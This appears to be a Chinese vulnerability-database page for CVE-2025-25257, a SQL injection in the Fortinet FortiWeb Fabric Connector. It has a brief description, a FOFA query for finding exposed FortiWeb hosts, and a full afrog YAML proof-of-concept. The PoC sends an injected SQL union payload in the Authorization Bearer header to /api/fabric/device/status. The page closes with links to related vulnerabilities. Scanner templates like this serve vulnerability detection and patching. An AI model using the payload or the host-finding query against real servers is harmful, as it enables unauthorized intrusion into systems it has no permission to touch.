CVE-2025-25257: Fortinet FortiWeb SQL注入漏洞

日期: 2025-09-01 | 影响软件: Fortinet FortiWeb | POC: 已公开

漏洞描述

该漏洞源于Fortinet FortiWeb Fabric Connector 组件在认证处理中没有严格校验输入参数，攻击者可在 Authorization: Bearer 头中注入恶意SQL语句，实现远程代码执行获取服务器权限 fofa：title="fortiweb - "

PoC代码[已公开]

id: CVE-2025-25257

info:
  name: Fortinet FortiWeb SQL注入漏洞
  author: avic123
  severity: critical
  verified: true
  description: |
    该漏洞源于Fortinet FortiWeb Fabric Connector 组件在认证处理中没有严格校验输入参数，攻击者可在 Authorization: Bearer 头中注入恶意SQL语句，实现远程代码执行获取服务器权限
    fofa：title="fortiweb - "
  reference:
    - https://mp.weixin.qq.com/s/uX7DFLxlxOdVl0Yc-VHUWg
  tags: Fortinet,CVE,CVE-2025-25257,sqli
  created: 2025/07/14

rules:
  r0:
    request:
      method: GET
      path: /
    expression: response.status == 200 && response.body.ibcontains(b"<title>FortiWeb -")
  r1:
    request:
      method: GET
      path: /api/fabric/device/status
      headers:
        Authorization: Bearer 'and('x'='x')union(select(@@global.secure_file_priv));--+-
    expression: >-
      response.status == 401
expression: r0() && r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2025/CVE-2025-25257.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2025-25257: Fortinet FortiWeb - SQL Injection POC

Fortinet FortiWeb /api/fabric/device/status SQL 注入漏洞（CVE-2025-25257） 无POC

Fortinet FortiWeb SQL注入漏洞 无POC

Wordpress Plugin Depicter /wp-admin/admin-ajax.php depicter-lead-list SQL 注入漏洞（CVE-2025-2011） 无POC

Wordpress Plugin Eventin /wp-admin/admin-ajax.php proxy_image 文件读取漏洞（CVE-2025-3419） 无POC

Fortinet FortiWeb /api/fabric/device/status SQL 注入漏洞（CVE-2025-25257）无POC

Fortinet FortiWeb SQL注入漏洞无POC

Wordpress Plugin Depicter /wp-admin/admin-ajax.php depicter-lead-list SQL 注入漏洞（CVE-2025-2011）无POC

Wordpress Plugin Eventin /wp-admin/admin-ajax.php proxy_image 文件读取漏洞（CVE-2025-3419）无POC